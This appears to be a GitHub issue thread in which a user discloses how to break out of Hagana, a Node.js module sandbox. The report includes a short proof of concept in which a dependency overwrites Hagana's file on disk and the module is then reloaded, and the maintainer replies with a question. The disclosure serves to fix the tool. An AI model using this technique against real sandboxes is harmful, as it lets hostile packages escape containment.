Hagana overwrite break out

[Mickael-van-der-Beek]

This one is relatively simple.

Since Hagana is probably installed in the same node_modules directory as the potentially dangerous modules, it's possible to overwrite it and reload the module.

Main file ./src/index.js content:

const hagana = require('@hagana/hagana');

hagana.setModulesFolder('node_modules');
hagana.setRoot('.');

const { run } = require('mylib');
run();

delete require.cache[require.resolve('@hagana/hagana')];
require('@hagana/hagana');

The dangerous library ./node_modules/mylib/index.js content:

const fs = require('fs');

exports.run = function run () {
  fs.writeFileSync(require.resolve('@hagana/hagana'), 'console.log("Yolooo");', { encoding: 'utf-8' });
};

[yaakov123]

But won't the initial overrides already have taken place?